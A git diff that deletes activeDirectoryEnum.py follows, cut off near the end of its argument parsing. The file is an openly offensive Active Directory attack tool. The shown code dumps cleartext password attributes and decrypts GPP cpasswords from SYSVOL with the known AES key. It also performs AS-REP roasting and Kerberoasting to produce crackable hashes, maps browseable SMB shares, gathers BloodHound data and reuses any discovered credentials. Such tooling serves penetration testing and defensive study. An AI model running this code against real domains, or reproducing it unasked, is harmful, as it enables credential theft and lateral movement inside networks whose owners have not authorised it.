diff --git a/activeDirectoryEnum.py b/activeDirectoryEnum.py deleted file mode 100755 index d3fdd96..0000000 --- a/activeDirectoryEnum.py +++ /dev/null @@ -1,818 +0,0 @@ -#!/usr/bin/env python3 -import warnings -from ldap3 import Server, Connection, ALL, SUBTREE -from progressbar import Bar, Percentage, ProgressBar, ETA -from ldap3.core.exceptions import LDAPKeyError -from impacket.smbconnection import SessionError -from impacket.nmb import NetBIOSTimeout, NetBIOSError -from getpass import getpass -from termcolor import colored -from impacket import smbconnection -import contextlib, argparse, textwrap, sys, socket, json, re, os, base64 -from Cryptodome.Cipher import AES -from dns.resolver import NXDOMAIN - -# Thanks SecureAuthCorp for GetNPUsers.py -# For Kerberos preauthentication -from impacket.krb5 import constants -from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, AS_REP, seq_set, seq_set_iter -from impacket.krb5.kerberosv5 import sendReceive, KerberosError -from impacket.krb5.types import KerberosTime, Principal -from pyasn1.codec.der import decoder, encoder -from pyasn1.type.univ import noValue -from binascii import hexlify -import datetime, random - -# Thanks SecureAuthCorp for GetUserSPNs.py -# For SPN enum -from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS -from impacket.ntlm import compute_lmhash, compute_nthash -from impacket.krb5.asn1 import TGS_REP - -from external.bloodhound import BloodHound, resolve_collection_methods -from external.bloodhound.ad.domain import AD -from external.bloodhound.ad.authentication import ADAuthentication - - -class EnumAD(): - - def __init__(self, domainController, ldaps, output, enumsmb, bhout, kpre, spnEnum, searchSysvol, domuser=None, computer=None): - warnings.warn("Deprecation warning: This module receives no new updates. Use pip package instead", UserWarning) - self.server = domainController - self.domuser = domuser - self.ldaps = ldaps - self.output = output - self.bhout = bhout - self.kpre = kpre - self.spnEnum = spnEnum - self.enumsmb = enumsmb - self.searchSysvol = searchSysvol - - self.ou_structure = domainController.split('.') - self.dc_string='' - for element in self.ou_structure: - self.dc_string += 'dc={},'.format(element) - - # LDAP properties - # At the moment we just want everything - self.ldapProps = ["*"] - - - # Setting lists containing elements we want from the domain controller - self.computers = [] - self.people = [] - self.groups = [] - self.spn = [] - self.acl = [] - self.gpo = [] - self.domains = [] - self.ous = [] - self.deletedUsers = [] - self.passwd = False - - if domuser is not False: - self.runWithCreds() - else: - self.runWithoutCreds() - - - def runWithCreds(self): - self.CREDS = True - if not self.passwd: - self.passwd = str(getpass()) - self.bind() - self.search() - - if self.output: - self.write_file() - - self.checkForPW() - self.checkOS() - if self.searchSysvol: - self.checkSYSVOL() - - if self.bhout: - self.outputToBloodhoundJson() - - if self.kpre: - self.enumKerbPre() - - if self.spnEnum: - self.enumSPNUsers() - - self.conn.unbind() - - if self.enumsmb: - # Setting variables for further testing and analysis - self.smbShareCandidates = [] - self.smbBrowseable = {} - self.sortComputers() - self.enumSMB() - - # Lets clear variable now - self.passwd = None - - - def runWithoutCreds(self): - self.CREDS = False - print('[ ' + colored('INFO', 'green') + ' ] Attempting to get objects without credentials') - self.passwd = '' - self.domuser = '' - print('') - - self.bind() - self.search() - - if self.output: - self.write_file() - - self.checkForPW() - self.checkOS() - - self.enumForCreds(self.people) - - print('[ ' + colored('WARN', 'yellow') +' ] Didn\'t find useable info as anonymous user, please gather credentials and run again') - exit(0) - - - @contextlib.contextmanager - def suppressOutput(self): - with open(os.devnull, 'w') as devnull: - with contextlib.redirect_stderr(devnull) as err, contextlib.redirect_stdout(devnull) as out: - yield (err, out) - - - def bind(self): - try: - if self.ldaps: - self.dc_conn = Server(self.server, port=636, use_ssl=True, get_info='ALL') - self.conn = Connection(self.dc_conn, user=self.domuser, password=self.passwd) - self.conn.bind() - self.conn.start_tls() - # Validate the login (bind) request - if int(self.conn.result['result']) != 0: - print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAPS server: {0}'.format(self.conn.result['description'])) - sys.exit(1) - else: - print('\033[1A\r[ ' + colored('OK', 'green') +' ] Bound to LDAPS server: {0}'.format(self.server)) - else: - self.dc_conn = Server(self.server, get_info=ALL) - self.conn = Connection(self.dc_conn, user=self.domuser, password=self.passwd) - self.conn.bind() - # Validate the login (bind) request - if int(self.conn.result['result']) != 0: - print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAP server: {0}'.format(self.conn.result['description'])) - sys.exit(1) - else: - print('\033[1A\r[ ' + colored('OK', 'green') +' ] Bound to LDAP server: {0}'.format(self.server)) - # TODO: Catch individual exceptions instead - except Exception: - if self.ldaps: - print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAPS server: {0}'.format(self.server)) - else: - print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAP server: {0}'.format(self.server)) - sys.exit(1) - - - def search(self): - # Get computer objects - self.conn.search(self.dc_string[:-1], '(&(sAMAccountType=805306369)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.computers.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all Computer objects') - - # Get person objects - self.conn.search(self.dc_string[:-1], '(objectCategory=person)', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.people.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all Person objects') - - # Get group objects - self.conn.search(self.dc_string[:-1], '(|(samaccounttype=268435456)(samaccounttype=268435457)(samaccounttype=536870912)(samaccounttype=536870913)(primarygroupid=*))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.groups.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all Group objects') - - # Get SPN objects - self.conn.search(self.dc_string[:-1], '(&(samaccounttype=805306368)(serviceprincipalname=*))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.spn.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all SPN objects') - - # Get ACL objects - self.conn.search(self.dc_string[:-1], '(|(samAccountType=805306368)(samAccountType=805306369)(samAccountType=268435456)(samAccountType=268435457)(samAccountType=536870912)(samAccountType=536870913)(objectClass=domain)(&(objectcategory=groupPolicyContainer)(flags=*))(objectcategory=organizationalUnit))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.acl.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all ACL objects') - - # Get GPO objects - self.conn.search(self.dc_string[:-1], '(|(&(&(objectcategory=groupPolicyContainer)(flags=*))(name=*)(gpcfilesyspath=*))(objectcategory=organizationalUnit)(objectClass=domain))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.gpo.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all GPO objects') - - # Get Domain - self.conn.search(self.dc_string[:-1], '(objectclass=domain)', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.domains.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all Domains') - - # Get OUs - self.conn.search(self.dc_string[:-1], '(objectclass=organizationalUnit)', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.ous.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all OUs') - - # Get deleted users - self.conn.search(self.dc_string[:-1], '(objectclass=user)', attributes=self.ldapProps, search_scope=SUBTREE, controls=[('1.2.840.113556.1.4.417', True, None)]) - for entry in self.conn.entries: - self.deletedUsers.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all deleted users') - if len(self.deletedUsers) > 0: - print('[ ' + colored('INFO', 'green') +' ] Searching for juicy info in deleted users') - self.enumForCreds(self.deletedUsers) - - - ''' - Since it sometimes is real that the property 'userPassword:' is set - we test for it and dump the passwords - ''' - def checkForPW(self): - passwords = {} - idx = 0 - for _ in self.people: - user = json.loads(self.people[idx].entry_to_json()) - idx += 1 - if user['attributes'].get('userPassword') is not None: - passwords[user['attributes']['name'][0]] = user['attributes'].get('userPassword') - if len(passwords.keys()) > 0: - with open('{0}-clearpw'.format(self.server), 'w') as f: - json.dump(passwords, f, sort_keys=False) - - if len(passwords.keys()) == 1: - print('[ ' + colored('WARN', 'yellow') +' ] Found {0} clear text password'.format(len(passwords.keys()))) - elif len(passwords.keys()) == 0: - print('[ ' + colored('OK', 'green') +' ] Found {0} clear text password'.format(len(passwords.keys()))) - else: - print('[ ' + colored('OK', 'green') +' ] Found {0} clear text passwords'.format(len(passwords.keys()))) - - - ''' - While it is not unusual to find EOL servers hidden or forgotten these - often makes easier targets for lateral movemen, and because of that - we'll dump the lowest registered OS and the respective hosts for easier - enumeration afterwards - ''' - def checkOS(self): - - os_json = { - # Should perhaps include older version - "Windows XP": [], - "Windows Server 2008": [], - "Windows 7": [], - "Windows Server 2012": [], - "Windows 10": [], - "Windows Server 2016": [], - "Windows Server 2019": [] - } - idx = 0 - for _ in self.computers: - computer = json.loads(self.computers[idx].entry_to_json()) - idx += 1 - - for os_version in os_json.keys(): - try: - if os_version in computer['attributes'].get('operatingSystem'): - os_json[os_version].append(computer['attributes']['dNSHostName']) - except TypeError: - # computer['attributes'].get('operatingSystem') is of NoneType, just continue - continue - - for key, value in os_json.items(): - if len(value) == 0: - continue - with open('{0}-oldest-OS'.format(self.server), 'w') as f: - for item in value: - f.write('{0}: {1}\n'.format(key, item)) - break - - print('[ ' + colored('OK', 'green') + ' ] Wrote hosts with oldest OS to {0}-oldest-OS'.format(self.server)) - - - def checkSYSVOL(self): - print('[ .. ] Searching SYSVOL for cpasswords\r') - cpasswords = {} - try: - smbconn = smbconnection.SMBConnection('\\\\{0}\\'.format(self.server), self.server, timeout=5) - smbconn.login(self.domuser, self.passwd) - dirs = smbconn.listShares() - for share in dirs: - if str(share['shi1_netname']).rstrip('\0').lower() == 'sysvol': - path = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), '*') - paths = [e.get_shortname() for e in path if len(e.get_shortname()) > 2] - for dirname in paths: - try: - # Dont want . or .. - subPath = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), str(dirname) + '\\*') - for sub in subPath: - if len(sub.get_shortname()) > 2: - paths.append(dirname + '\\' + sub.get_shortname()) - except (SessionError, UnicodeEncodeError, NetBIOSError) as e: - continue - - # Compile regexes for username and passwords - cpassRE = re.compile(r'cpassword=\"([a-zA-Z0-9/]+)\"') - unameRE = re.compile(r'userName|runAs=\"([ a-zA-Z0-9/\(\)-]+)\"') - - # Prepare the ciphers based on MSDN article with key and IV - cipher = AES.new(bytes.fromhex('4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'), AES.MODE_CBC, bytes.fromhex('00' * 16)) - - # Since the first entry is the DC we dont want that - for item in paths[1:]: - if '.xml' in item.split('\\')[-1]: - with open('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]), 'wb') as f: - smbconn.getFile(str(share['shi1_netname']).rstrip('\0'), item, f.write) - with open('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]), 'r') as f: - try: - fileContent = f.read() - passwdMatch = cpassRE.findall(str(fileContent)) - for passwd in passwdMatch: - unameMatch = unameRE.findall(str(fileContent)) - for usr in unameMatch: - padding = '=' * (4 - len(passwd) % 4) - # For some reason, trailing nul bytes were on each character, so we remove any if they are there - cpasswords[usr] = cipher.decrypt(base64.b64decode(bytes(passwd + padding, 'utf-8'))).strip().decode('utf-8').replace('\x00', '') - except (UnicodeDecodeError, AttributeError) as e: - # Remove the files we had to write during the search - os.unlink('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1])) - continue - - # Remove the files we had to write during the search - os.unlink('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1])) - - if len(cpasswords.keys()) > 0: - with open('{0}-cpasswords.json'.format(self.server), 'w') as f: - json.dump(cpasswords, f) - - if len(cpasswords.keys()) == 1: - print('\033[1A\r[ ' + colored('OK', 'green') +' ] Found {0} cpassword in a GPO on SYSVOL share'.format(len(cpasswords.keys()))) - else: - print('\033[1A\r[ ' + colored('OK', 'green') +' ] Found {0} cpasswords in GPOs on SYSVOL share'.format(len(cpasswords.keys()))) - - - except (SessionError, UnicodeEncodeError, NetBIOSError): - print('[ ' + colored('ERROR', 'red') + ' ] Some error occoured while searching SYSVOL') - else: - smbconn.close() - - - def splitJsonArr(self, arr): - if isinstance(arr, list): - if len(arr) == 1: - return arr[0] - return arr - - - def outputToBloodhoundJson(self): - print('[ ' + colored('OK', 'green') +' ] Generating BloodHound output - this may take time...') - try: - with self.suppressOutput(): - opts = argparse.Namespace(dns_tcp=False, global_catalog=self.server) - auth = ADAuthentication(username=self.domuser, password=self.passwd, domain=self.server) - try: - ad = AD(auth=auth, domain=self.server, nameserver=None, dns_tcp=False) - ad.dns_resolve(kerberos=False, domain=self.server, options=opts) - except (NXDOMAIN) as e: - # So we didnt succeed with DNS lookup. Most likely an internal, so lets try to point to the DC - print('[ ' + colored('WARN', 'yellow') +' ] DNS lookup of Domain Controller failed - attempting to set the DC as Nameserver') - try: - ns = socket.gethostbyname(self.server) - opts = argparse.Namespace(dns_tcp=False, global_catalog=self.server, nameserver=ns) - ad = AD(auth=auth, domain=self.server, nameserver=ns, dns_tcp=False) - ad.dns_resolve(kerberos=False, domain=self.server, options=opts) - except (NXDOMAIN) as e: - # I'm all out of luck - print('[ ' + colored('ERROR', 'red') +' ] DNS lookup of Domain Controller failed with DC as nameserver') - exit(1) - with self.suppressOutput(): - bloodhound = BloodHound(ad) - bloodhound.connect() - collection = resolve_collection_methods('Session,Trusts,ACL,DCOM,RDP,PSRemote') - bloodhound.run(collect=collection, num_workers=40, disable_pooling=False) - print('[ ' + colored('OK', 'green') +' ] BloodHound output generated') - except Exception as e: - print('[ ' + colored('ERROR', 'red') + f' ] Generating BloodHound output failed: {e}') - - - def sortComputers(self): - for computer in self.computers: - try: - self.smbShareCandidates.append(computer['dNSHostName']) - except LDAPKeyError: - # No dnsname registered - continue - if len(self.smbShareCandidates) == 1: - print('[ ' + colored('OK', 'green') +' ] Found {0} dnsname'.format(len(self.smbShareCandidates))) - else: - print('[ ' + colored('OK', 'green') +' ] Found {0} dnsnames'.format(len(self.smbShareCandidates))) - - - def enumSMB(self): - progBar = ProgressBar(widgets=['SMBConnection test: ', Percentage(), Bar(), ETA()], maxval=len(self.smbShareCandidates)).start() - prog = 0 - try: - for dnsname in self.smbShareCandidates: - try: - # Changing default timeout as shares should respond withing 5 seconds if there is a share - # and ACLs make it available to self.user with self.passwd - smbconn = smbconnection.SMBConnection('\\\\' + str(dnsname), str(dnsname), timeout=5) - smbconn.login(self.domuser, self.passwd) - dirs = smbconn.listShares() - self.smbBrowseable[str(dnsname)] = {} - for share in dirs: - self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = '' - try: - _ = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), '*') - self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = True - except (SessionError, UnicodeEncodeError, NetBIOSError): - # Didnt have permission, all good - # Im second guessing the below adding to the JSON file as we're only interested in the listable directories really - #self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = False - continue - smbconn.logoff() - progBar.update(prog + 1) - prog += 1 - except (socket.error, NetBIOSTimeout, SessionError, NetBIOSError): - # TODO: Examine why we sometimes get: - # impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_NOT_AVAILABLE - # on healthy shares. It seems to be reported with CIF shares - progBar.update(prog + 1) - prog += 1 - continue - except ValueError: - # We reached end of progressbar, continue since we finish below - pass - progBar.finish() - print('') - - availDirs = [] - for key, value in self.smbBrowseable.items(): - for _, v in value.items(): - if v: - availDirs.append(key) - - if len(self.smbShareCandidates) == 1: - print('[ ' + colored('OK', 'green') + ' ] Searched {0} share and {1} with {2} subdirectories/files is browseable by {3}'.format(len(self.smbShareCandidates), len(self.smbBrowseable.keys()), len(availDirs), self.domuser)) - else: - print('[ ' + colored('OK', 'green') + ' ] Searched {0} shares and {1} with {2} subdirectories/file sare browseable by {3}'.format(len(self.smbShareCandidates), len(self.smbBrowseable.keys()), len(availDirs), self.domuser)) - if len(self.smbBrowseable.keys()) > 0: - with open('{0}-open-smb.json'.format(self.server), 'w') as f: - json.dump(self.smbBrowseable, f, indent=4, sort_keys=False) - print('[ ' + colored('OK', 'green') + ' ] Wrote browseable shares to {0}-open-smb.json'.format(self.server)) - - - - def write_file(self): - with open(str(self.output) + '-computers', 'w') as f: - for item in self.computers: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-people', 'w') as f: - for item in self.people: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-groups', 'w') as f: - for item in self.groups: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-spn', 'w') as f: - for item in self.spn: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-acl', 'w') as f: - for item in self.acl: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-gpo', 'w') as f: - for item in self.gpo: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-domains', 'w') as f: - for item in self.domains: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-ous', 'w') as f: - for item in self.ous: - f.write(str(item)) - f.write("\n") - - print('[ ' + colored('OK', 'green') +' ] Wrote all files to {0}-obj_name'.format(self.output)) - - - def enumKerbPre(self): - # Build user array - users = [] - self.conn.search(self.dc_string[:-1], '(&(samaccounttype=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - users.append(str(entry['sAMAccountName']) + '@{0}'.format(self.server)) - if len(users) == 0: - print('[ ' + colored('OK', 'green') +' ] Found {0} accounts that does not require Kerberos preauthentication'.format(len(users))) - elif len(users) == 1: - print('[ ' + colored('OK', 'yellow') +' ] Found {0} account that does not require Kerberos preauthentication'.format(len(users))) - else: - print('[ ' + colored('OK', 'yellow') +' ] Found {0} accounts that does not require Kerberos preauthentication'.format(len(users))) - - hashes = [] - # Build request for Tickets - for usr in users: - clientName = Principal(usr, type=constants.PrincipalNameType.NT_PRINCIPAL.value) - asReq = AS_REQ() - domain = str(self.server).upper() - serverName = Principal('krbtgt/{0}'.format(domain), type=constants.PrincipalNameType.NT_PRINCIPAL.value) - pacReq = KERB_PA_PAC_REQUEST() - pacReq['include-pac'] = True - encodedPacReq = encoder.encode(pacReq) - asReq['pvno'] = 5 - asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value) - asReq['padata'] = noValue - asReq['padata'][0] = noValue - asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value) - asReq['padata'][0]['padata-value'] = encodedPacReq - - requestBody = seq_set(asReq, 'req-body') - - options = list() - options.append(constants.KDCOptions.forwardable.value) - options.append(constants.KDCOptions.renewable.value) - options.append(constants.KDCOptions.proxiable.value) - requestBody['kdc-options'] = constants.encodeFlags(options) - - seq_set(requestBody, 'sname', serverName.components_to_asn1) - seq_set(requestBody, 'cname', clientName.components_to_asn1) - - requestBody['realm'] = domain - - now = datetime.datetime.utcnow() + datetime.timedelta(days=1) - requestBody['till'] = KerberosTime.to_asn1(now) - requestBody['rtime'] = KerberosTime.to_asn1(now) - requestBody['nonce'] = random.getrandbits(31) - - supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),) - - seq_set_iter(requestBody, 'etype', supportedCiphers) - - msg = encoder.encode(asReq) - - try: - response = sendReceive(msg, domain, self.server) - except KerberosError as e: - if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value: - supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value), int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),) - seq_set_iter(requestBody, 'etype', supportedCiphers) - msg = encoder.encode(asReq) - response = sendReceive(msg, domain, self.server) - else: - print(e) - continue - - asRep = decoder.decode(response, asn1Spec=AS_REP())[0] - - hashes.append('$krb5asrep${0}@{1}:{2}${3}'.format(usr, domain, hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(), hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())) - - if len(hashes) > 0: - with open('{0}-jtr-hashes'.format(self.server), 'w') as f: - for h in hashes: - f.write(str(h) + '\n') - - print('[ ' + colored('OK', 'yellow') +' ] Wrote all hashes to {0}-jtr-hashes'.format(self.server)) - else: - print('[ ' + colored('OK', 'green') +' ] Got 0 hashes') - - - def enumSPNUsers(self): - users_spn = { - } - user_tickets = { - } - - userDomain = self.domuser.split('@')[1] - - idx = 0 - for entry in self.spn: - # TODO: Consider a better name than spn since spn is referenced below. It's confusing. - spn = json.loads(self.spn[idx].entry_to_json()) - users_spn[self.splitJsonArr(spn['attributes'].get('name'))] = self.splitJsonArr(spn['attributes'].get('servicePrincipalName')) - idx += 1 - - # Get TGT for the supplied user - client = Principal(self.domuser, type=constants.PrincipalNameType.NT_PRINCIPAL.value) - try: - # We need to take the domain from the user@domain since it *could* be a cross-domain user - tgt, cipher, _, newSession = getKerberosTGT(client, '', userDomain, compute_lmhash(self.passwd), compute_nthash(self.passwd), None, kdcHost=None) - - TGT = {} - TGT['KDC_REP'] = tgt - TGT['cipher'] = cipher - TGT['sessionKey'] = newSession - - for user, spns in users_spn.items(): - if isinstance(spns, list): - # We only really need one to get a ticket - spn = spns[0] # lgtm [py/multiple-definition] - else: - spn = spns - try: - # Get the TGS - serverName = Principal(spn, type=constants.PrincipalNameType.NT_SRV_INST.value) - tgs, cipher, _, newSession = getKerberosTGS(serverName, userDomain, None, TGT['KDC_REP'], TGT['cipher'], TGT['sessionKey']) - # Decode the TGS - decoded = decoder.decode(tgs, asn1Spec=TGS_REP())[0] - # Get different encryption types - if decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value: - entry = '$krb5tgs${0}$*{1}${2}${3}*${4}${5}'.format(constants.EncryptionTypes.rc4_hmac.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][:16].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][16:].asOctets()).decode()) - user_tickets[spn] = entry - elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value: - entry = '$krb5tgs${0}${1}${2}$*{3}*${4}${5}'.format(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][:-12].asOctets()).decode()) - user_tickets[spn] = entry - elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value: - entry = '$krb5tgs${0}${1}${2}$*{3}*${4}${5}'.format(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][:-12].asOctets()).decode()) - user_tickets[spn] = entry - elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.des_cbc_md5.value: - entry = '$krb5tgs${0}$*{1}${2}${3}*${4}${5}'.format(constants.EncryptionTypes.des_cbc_md5.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][:16].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][16:].asOctets()).decode()) - user_tickets[spn] = entry - - except KerberosError: - # For now continue - # TODO: Maybe look deeper into issue here - continue - - if len(user_tickets.keys()) > 0: - with open('{0}-spn-tickets'.format(self.server), 'w') as f: - for key, value in user_tickets.items(): - f.write('{0}:{1}\n'.format(key, value)) - if len(user_tickets.keys()) == 1: - print('[ ' + colored('OK', 'yellow') +' ] Got and wrote {0} ticket for Kerberoasting. Run: john --format=krb5tgs --wordlist= {1}-spn-tickets'.format(len(user_tickets.keys()), self.server)) - else: - print('[ ' + colored('OK', 'yellow') +' ] Got and wrote {0} tickets for Kerberoasting. Run: john --format=krb5tgs --wordlist= {1}-spn-tickets'.format(len(user_tickets.keys()), self.server)) - else: - print('[ ' + colored('OK', 'green') +' ] Got {0} tickets for Kerberoasting'.format(len(user_tickets.keys()))) - - - except KerberosError as err: - print('[ ' + colored('ERROR', 'red') +' ] Kerberoasting failed with error: {0}'.format(err.getErrorString()[1])) - - - def enumForCreds(self, ldapdump): - searchTerms = [ - 'legacy', 'pass', 'password', 'pwd', 'passcode' - ] - excludeTerms = [ - 'badPasswordTime', 'badPwdCount', 'pwdLastSet', 'legacyExchangeDN' - ] - possiblePass = {} - idx = 0 - for _ in ldapdump: - user = json.loads(ldapdump[idx].entry_to_json()) - for prop, value in user['attributes'].items(): - if any(term in prop.lower() for term in searchTerms) and not any(ex in prop for ex in excludeTerms): - try: - possiblePass[user['attributes']['userPrincipalName'][0]] = value[0] - except KeyError: - # Could be a service user instead - try: - possiblePass[user['attributes']['servicePrincipalName'][0]] = value[0] - except KeyError: - # Don't know which type - continue - - idx += 1 - if len(possiblePass) > 0: - print('[ ' + colored('INFO', 'green') +' ] Found possible password in properties') - print('[ ' + colored('INFO', 'green') +' ] Attempting to determine if it is a password') - - for user, password in possiblePass.items(): - try: - usr, passwd = self.entroPass(user, password) - except TypeError: - # None returned, just continue - continue - if not self.CREDS: - self.domuser = usr - self.passwd = passwd - self.runWithCreds() - exit(0) - - - def entroPass(self, user, password): - if not password: - return None - # First check if it is a clear text - dc_test_conn = Server(self.server, get_info=ALL) - test_conn = Connection(dc_test_conn, user=user, password=password) - test_conn.bind() - # Validate the login (bind) request - if int(test_conn.result['result']) != 0: - if self.CREDS: - print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" with: "{1}" as possible clear text password'.format(user, password)) - else: - print('[ ' + colored('INFO', 'green') +' ] User: "{0}" with: "{1}" was not cleartext'.format(user, password)) - else: - if self.CREDS: - print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" had cleartext password of: "{1}" in a property'.format(user, password)) - else: - print('[ ' + colored('OK', 'yellow') +' ] User: "{0}" had cleartext password of: "{1}" in a property - continuing with these creds'.format(user, password)) - print('') - return user, password - - test_conn.unbind() - - # Attempt for base64 - # Could be base64, lets try - try: - pw = base64.b64decode(bytes(password, encoding='utf-8')).decode('utf-8') - except base64.binascii.Error: - return None - - # Attempt decoded PW - dc_test_conn = Server(self.server, get_info=ALL) - test_conn = Connection(dc_test_conn, user=user, password=pw) - test_conn.bind() - # Validate the login (bind) request - if int(test_conn.result['result']) != 0: - if self.CREDS: - print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" with: "{1}" as possible base64 decoded password'.format(user, pw)) - else: - print('[ ' + colored('INFO', 'green') +' ] User: "{0}" with: "{1}" was not base64 encoded'.format(user, pw)) - else: - if self.CREDS: - print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" had base64 encoded password of: "{1}" in a property'.format(user, pw)) - else: - print('[ ' + colored('OK', 'yellow') +' ] User: "{0}" had base64 encoded password of: "{1}" in a property - continuing with these creds'.format(user, pw)) - print('') - return user, pw - - -if __name__ == "__main__": - parser = argparse.ArgumentParser(prog='activeDirectoryEnum', formatter_class=argparse.RawDescriptionHelpFormatter, description=textwrap.dedent(''' - ___ __ _ ____ _ __ ______ - / | _____/ /_(_) _____ / __ \(_)_______ _____/ /_____ _______ __/ ____/___ __ ______ ___ - / /| |/ ___/ __/ / | / / _ \/ / / / / ___/ _ \/ ___/ __/ __ \/ ___/ / / / __/ / __ \/ / / / __ `__ \\ - / ___ / /__/ /_/ /| |/ / __/ /_/ / / / / __/ /__/ /_/ /_/ / / / /_/ / /___/ / / / /_/ / / / / / / - /_/ |_\___/\__/_/ |___/\___/_____/_/_/ \___/\___/\__/\____/_/ \__, /_____/_/ /_/\__,_/_/ /_/ /_/ - /____/ - - |*----------------------------------------------------------------------------------------------------------*| - - ''')) - parser.add_argument('dc', type=str, help='Hostname of the Domain Controller') - parser.add_argument('-o', '--out-file', type=str, help='Path to output file. If no path, CWD is assumed (default: None)') - parser.add_argument('-u', '--user', type=str, help='Username of the domain user to query with. The username has to be domain name as `user@domain.org`') - parser.add_argument('-s', '--secure', help='Try to estalish connection through LDAPS', action='store_true') - parser.add_argument('-smb', '--smb', help='Force enumeration of SMB shares on all computer objects fetched', action='store_true') - parser.add_argument('-kp', '--kerberos_preauth', help='Attempt to gather users that does not require Kerberos preauthentication', action='store_true') - parser.add_argument('-bh', '--bloodhound', help='Output data in the format expected by BloodHound', action='store_true') - parser.add_argument('-spn', help='Attempt to get all SPNs and perform Kerberoasting', action='store_true') - parser.add_argument('-sysvol', help='Search sysvol for GPOs with cpassword and decrypt it', action='store_true') - parser.add_argument('--all', help='Run all checks', action='store_true') - parser.add_argument('--no-creds', help='Start without credentials', action='store_true') - - if len(sys.argv) == 1: - parser.print_help(sys.stderr) - #warnings.warn("Deprecation warning: This module receives no new updates. Use pip package instead", UserWarning) - sys.exit(1) - - args = parser.parse_args() - - # If theres more than 4 sub'ed (test.test.domain.local) - tough luck sunny boy - domainRE = re.compile(r'^((?:[a-zA-Z0-9-.]+)?(?:[a-zA-Z0-9-.]+)?[a-zA-Z0-9-]+\.[a-zA-Z]+)$') - userRE = re.compile(r'^([a-zA-Z0-9-\.]+@(?:[a-zA-Z0-9-.]+)?(?:[a-zA-Z0-9-.]+)?[a-zA-Z0-9-]+\.[a-zA-Z0-9-]+)$') - - domainMatch = domainRE.findall(args.dc) - - if not domainMatch: - print('[ ' + colored('ERROR', 'red') +' ] Domain flag has to be in the form "domain.local"') - sys.exit(1) - - if args.all: - args.smb = True - args.kerberos_preauth = True - args.bloodhound = 